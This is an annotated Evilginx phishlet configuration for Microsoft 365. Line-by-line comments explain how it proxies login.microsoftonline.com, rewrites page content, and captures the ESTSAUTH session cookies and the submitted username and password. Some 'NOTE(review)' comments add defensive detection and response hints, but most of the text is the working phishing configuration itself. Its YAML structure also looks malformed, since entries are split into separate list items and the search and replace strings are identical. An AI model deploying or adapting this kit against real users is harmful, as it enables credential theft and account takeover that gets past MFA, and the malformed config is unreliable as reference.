Below is an expanded, line-by-line explanation of the Microsoft 365 phishlet example:
# Name of the phishlet for identification
name: 'microsoft 365'
# Specifies minimum Evilginx version required for compatibility
min_ver: '3.0.0'
# Defines hosts to be proxied between visitor and legitimate websites
# NOTE(review): the hostname a visitor actually sees is presumably built from
# phish_sub plus a domain the operator controls (not shown on this page); the
# mismatch with the legitimate domain is what URL filtering, certificate-
# transparency monitoring and user awareness rely on to spot a proxied login.
proxy_hosts:
# The subdomain that will be used for the phishing hostname
- phish_sub: 'login'
# The original Microsoft subdomain that is being mimicked
- orig_sub: 'login'
# The original Microsoft domain that is being mimicked
- domain: 'microsoftonline.com'
# Enable session cookie capture for this host
# NOTE(review): what is captured here is a replayable session cookie rather than
# a password, so a password reset alone does not end it; revoking the user's
# sessions/refresh tokens is the response step — confirm against tenant tooling.
- session: true
# Indicates this host will be used for the phishing landing page URL
- is_landing: true
# Second entry for another host to proxy
- phish_sub: 'account'
- orig_sub: 'account'
- domain: 'microsoftonline.com'
- session: false # Disable cookie capture for this host
- is_landing: false # Not the landing page
# Defines filters to modify proxied website content
# NOTE(review): in every filter below the search and replace strings are written
# identically; the `{hostname}` placeholder is presumably expanded differently on
# each side by the proxy, but those expansion rules are not shown on this page.
sub_filters:
# Hostname that triggers this filter
- triggers_on: 'login.microsoftonline.com'
# Original subdomain to find and replace
- orig_sub: 'login'
# Original domain to find and replace
- domain: 'microsoftonline.com'
# Search regex to find strings in responses
- search: 'https://{hostname}/ppsecure/'
# Replacement string for matches
- replace: 'https://{hostname}/ppsecure/'
# MIME types that trigger filter
- mimes: ['text/html', 'application/json', 'application/javascript']
# Next filter entry
- triggers_on: 'login.microsoftonline.com'
- orig_sub: 'login'
- domain: 'microsoftonline.com'
- search: 'https://{hostname}/GetCredentialType.srf'
- replace: 'https://{hostname}/GetCredentialType.srf'
- mimes: ['text/html', 'application/json', 'application/javascript']
# Next filter entry
- triggers_on: 'login.microsoftonline.com'
- orig_sub: 'login'
- domain: 'microsoftonline.com'
- search: 'https://{hostname}/GetSessionState.srf'
- replace: 'https://{hostname}/GetSessionState.srf'
- mimes: ['text/html', 'application/json', 'application/javascript']
# Next filter entry
- triggers_on: 'login.microsoftonline.com'
- orig_sub: 'login'
- domain: 'microsoftonline.com'
- search: 'href="https://{hostname}'
- replace: 'href="https://{hostname}'
- mimes: ['text/html', 'application/json', 'application/javascript']
# Next filter entry
- triggers_on: 'login.microsoftonline.com'
- orig_sub: 'login'
- domain: 'microsoftonline.com'
- search: 'https://{hostname}'
- replace: 'https://{hostname}'
- mimes: ['text/html', 'application/json', 'application/javascript']
- redirect_only: true # Only on redirected URLs
# Defines session cookies to capture
# NOTE(review): the cookie names listed below are the defender's detection
# handle — a sign-in log showing the same session used from a new address or
# device shortly after an interactive sign-in is the replay signal to alert on;
# verify which of these names your tenant's logs actually surface.
auth_tokens:
# Domain to capture cookies from
- domain: '.login.microsoftonline.com'
# Names of cookies to capture
- keys: ['ESTSAUTH:always' , 'ESTSAUTHPERSISTENT' , 'SignInStateCookie:always']
- type: 'cookie' # Indicates cookie capture
# Specifies credentials POST data to capture
# NOTE(review): the '(.*)' pattern used below matches the entire submitted value,
# i.e. the whole username and whole password fields are recorded, not a fragment.
credentials:
# POST parameter name for username
- key: 'login'
- search: '(.*)' # Regex to extract value
- type: 'post' # POST data
# POST parameter for password
- key: 'passwd'
- search: '(.*)'
- type: 'post'
# Sets domain and path of the login page
login:
- domain: 'login.microsoftonline.com'
- path: '/?auth=2'